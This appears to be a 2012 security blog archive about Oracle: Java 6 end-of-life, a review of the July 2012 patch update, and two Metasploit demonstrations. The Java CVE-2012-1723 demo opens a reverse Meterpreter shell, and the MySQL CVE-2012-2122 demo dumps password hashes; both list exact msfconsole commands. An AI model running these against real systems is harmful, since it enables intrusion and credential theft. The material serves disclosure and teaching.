Tag Archives: Oracle

Oracle Pushes Java SE 7 Update to Uninstall Version 6

The last release of Java SE 6, version 6 update 33 (1.6.0_33-b03), was published on 12 Jun 2012 during the quarterly Oracle Java CPU (Critical Patch Update). This CPU fixed 14 security vulnerabilities in previous JSE product versions 7, 6, 5 and 4. One of these vulnerabilities was CVE-2012-1723, which is currently used in the Blackhole exploit kit.

Metasploit exploitation demonstration of CVE-2012-1723

For the past few days you may have seen a notification on your system asking you to update Java.

By getting details on the update you will see that Java SE 7 update 5 (1.7_5) is available, and that installing this update will remove your previous version of JSE. However, if you wish to keep Java 6 you will need to update from the offline Java installer to the latest version of JSE, which is version 7 update 5. Huh! What a choice: I have to update to version 7 or update to version 7.

As you may know, Java SE 6 will no longer be supported after November 2012. The last Java CPU update is planned for October 12, 2012. After November 2012, Oracle will no longer post updates of Java SE 6 to its public download sites. For enterprise customers who need continued access to critical bug fixes and security fixes, as well as general maintenance for Java SE 6 or older versions, long-term support is available through Oracle Java SE Support. But this forced Java SE update to version 7 suggests that Java SE 6 update 33 was the last one.

So we encourage you to plan a mega release across your infrastructure, because Java SE 6 seems to be officially dead!

Oracle Critical Patch Update Announcement for July 2012 Review

Oracle has published its Critical Patch Update (CPU) Pre-Release Announcement for July 2012; the CPU will be released on Tuesday, July 17. This CPU contains 88 security vulnerability fixes across hundreds of Oracle products. Some of the vulnerabilities affect multiple Oracle products. Of the 88 security vulnerabilities, 37 may be remotely exploitable without authentication, which represents 42% of the vulnerabilities. The highest CVSS Base Score for vulnerabilities in this CPU is 10.0, and it concerns Oracle Fusion Middleware.

As you may know, Oracle uses CVSS 2.0 (Common Vulnerability Scoring System) to score the reported vulnerabilities. But as you may also know, security researchers disagree with the way Oracle uses CVSS. Oracle plays with the CVSS score by creating a “Partial+” impact rating, which does not exist in CVSS 2.0, and by interpreting the “Complete” rating differently from the way CVSS 2.0 defines it.

Oracle Database Server

4 vulnerabilities are reported for “Oracle Database Server” and 3 of them may be remotely exploitable without authentication. The highest CVSS score of these vulnerabilities is 5.0. Affected components are “Core RDBMS” and “Network Layer”.

Oracle Application Express Listener

1 vulnerability is reported for “Oracle Application Express Listener” and this vulnerability may be remotely exploitable without authentication. The CVSS score of this vulnerability is 7.8. Affected component is “Oracle Application Express Listener”.

Oracle Secure Backup

2 vulnerabilities are reported for “Oracle Secure Backup” and both may be remotely exploitable without authentication. The highest CVSS score of these vulnerabilities is 7.8. Affected components are “Apache” and “PHP”.

Oracle Fusion Middleware

22 vulnerabilities are reported for “Oracle Fusion Middleware” and 8 of them may be remotely exploitable without authentication. The highest CVSS score of these vulnerabilities is 10.0. Affected components are “Enterprise Manager for Fusion Middleware”, “Oracle HTTP Server”, “Oracle JRockit”, “Oracle MapViewer”, “Oracle Outside In Technology” and “Portal”.

Oracle Hyperion

1 vulnerability is reported for “Oracle Hyperion” and this vulnerability may be remotely exploitable without authentication. The CVSS score of this vulnerability is 4.3. Affected component is “Hyperion BI+”.

Oracle Enterprise Manager Grid Control

1 vulnerability is reported for “Oracle Enterprise Manager Grid Control” and this vulnerability may be remotely exploitable without authentication. The CVSS score of this vulnerability is 6.8. Affected component is “Enterprise Manager for Oracle Database”.

Oracle E-Business Suite

4 vulnerabilities are reported for “Oracle E-Business Suite” and 2 of them may be remotely exploitable without authentication. The highest CVSS score of these vulnerabilities is 4.3. Affected components are “Oracle Application Object Library” and “Oracle E-Business Intelligence”.

Oracle Supply Chain Products Suite

5 vulnerabilities are reported for “Oracle Supply Chain Products Suite” and 1 of them may be remotely exploitable without authentication. The highest CVSS score of these vulnerabilities is 4.3. Affected components are “Oracle AutoVue” and “Oracle Transportation Management”.

Oracle PeopleSoft Products

9 vulnerabilities are reported for “Oracle PeopleSoft Products” and none of them may be remotely exploitable without authentication. The highest CVSS score of these vulnerabilities is 5.5. Affected components are “PeopleSoft Enterprise PeopleTools” and “PeopleSoft Enterprise HRMS”.

Oracle Siebel CRM

7 vulnerabilities are reported for “Oracle Siebel CRM” and 2 of them may be remotely exploitable without authentication. The highest CVSS score of these vulnerabilities is 6.8. Affected component is “Siebel CRM”.

Oracle Industry Applications

1 vulnerability is reported for “Oracle Industry Applications” and it is not remotely exploitable without authentication. The CVSS score of this vulnerability is 2.8. Affected component is “Oracle Clinical Remote Data Capture Option”.

Oracle Sun Products Suite

25 vulnerabilities are reported for “Oracle Sun Products Suite” and 17 of them may be remotely exploitable without authentication. The highest CVSS score of these vulnerabilities is 7.8. Affected components are “GlassFish Enterprise Server”, “Oracle iPlanet Web Server”, “Solaris”, “Solaris Cluster” and “SPARC T-Series Servers”.

Oracle MySQL

6 vulnerabilities are reported for “Oracle MySQL” and none of them may be remotely exploitable without authentication. The highest CVSS score of these vulnerabilities is 6.8. Affected component is “MySQL Server”.

CVE-2012-1723 Oracle Java Applet Field Bytecode Verifier Cache RCE Metasploit Demo

Timeline :

Public release of the vulnerability on 2012-06-12
First PoC provided by Michael Schierl on 2012-06-13
Metasploit PoC provided on 2012-07-09

PoC provided by :

Stefan Cornelius
mihi
littlelightlittlefire
juan vazquez
sinn3r

Reference(s) :

CVE-2012-1723
OSVDB-82877
BID-52161
Oracle Java SE Critical Patch Update Advisory – June 2012

Affected version(s) :

Oracle Java JSE 7 Update 4 and before
Oracle Java JSE 6 Update 32 and before
Oracle Java JSE 5 Update 35 and before
Oracle Java JSE 1.4.2_37 and before
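
A defender can turn the affected-version list above into an inventory check. This is an added example, not part of the original post or of Metasploit; the thresholds are the ones listed above, while the host names and the sample inventory are constructed.

```python
import re

# Highest affected build per Java family, from the "Affected version(s)" list.
# Key: <family> in 1.<family>.<micro>_<update>; value: (micro, update).
LAST_AFFECTED = {7: (0, 4), 6: (0, 32), 5: (0, 35), 4: (2, 37)}

# Matches strings such as 1.6.0_32-b05, 1.7.0_05 or 1.4.2 (no update suffix).
_VERSION = re.compile(r"^1\.(\d+)\.(\d+)(?:_(\d+))?(?:-\w+)?$")


def parse_java_version(text):
    """Parse '1.6.0_32-b05' into (family, micro, update) = (6, 0, 32)."""
    m = _VERSION.match(text.strip())
    if not m:
        raise ValueError(f"unrecognised Java version string: {text!r}")
    return int(m.group(1)), int(m.group(2)), int(m.group(3) or 0)


def is_affected(text):
    """True or False for the listed families, None for a family not listed."""
    family, micro, update = parse_java_version(text)
    if family not in LAST_AFFECTED:
        return None
    return (micro, update) <= LAST_AFFECTED[family]


def triage(inventory):
    """Map each host of {host: version} to 'affected', 'not affected' or 'unknown'."""
    labels = {True: "affected", False: "not affected", None: "unknown"}
    result = {}
    for host, version in inventory.items():
        try:
            result[host] = labels[is_affected(version)]
        except ValueError:
            result[host] = "unknown"  # unparseable strings need a manual look
    return result


# Constructed sample inventory (hypothetical host names).
SAMPLE_INVENTORY = {
    "ws-01": "1.6.0_32-b05",
    "ws-02": "1.6.0_33-b03",
    "ws-03": "1.7.0_05",
    "srv-legacy": "1.4.2_37",
    "kiosk": "not installed",
}

if __name__ == "__main__":
    for host, status in triage(SAMPLE_INVENTORY).items():
        print(f"{host}: {status}")
```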

Tested on Windows XP Pro SP3 with :

Oracle JSE 1.6.0_32-b05

Description :

This module exploits a vulnerability in the HotSpot bytecode verifier where an invalid optimisation of GETFIELD/PUTFIELD/GETSTATIC/PUTSTATIC instructions leads to insufficient type checks. This allows a way to escape the JRE sandbox, and load additional classes in order to perform malicious operations.

Commands :

use exploit/multi/browser/java_verifier_field_access
set SRVHOST 192.168.178.100
set PAYLOAD java/meterpreter/reverse_tcp
set LHOST 192.168.178.100
exploit

sysinfo
getuid

CVE-2012-2122 Oracle MySQL Authentication Bypass Password Dump Metasploit Demo

Timeline :

Vulnerability discovered by Sergei Golubchik in April 2012
Bug reported to vendor by Sergei Golubchik on 2012-04-06
Public release of the vulnerability on 2012-06-09
Metasploit PoC provided on 2012-06-11

PoC provided by :

Yorick Koster
jcran

Reference(s) :

CVE-2012-2122
Oracle MySQL BUG 64884
Oracle MySQL 5.1.63 Changes
Oracle MySQL 5.5.24 Changes

Affected version(s) :

Oracle MySQL versions before or equal to 5.1.61 (on some platforms)
Oracle MySQL versions before or equal to 5.5.24 (on some platforms)

Tested on Fedora release 16 (Verne) with :

5.5.23 MySQL Community Server

Description :

The targeted user must be allowed to connect remotely, for example:

grant all on *.* to root@'%' identified by 'password';

This module exploits a password bypass vulnerability in MySQL in order to extract the usernames and encrypted password hashes from a MySQL server. These hashes are stored as loot for later cracking.

Commands :

use auxiliary/scanner/mysql/mysql_authbypass_hashdump
set RHOSTS 192.168.178.43
set USERNAME root
run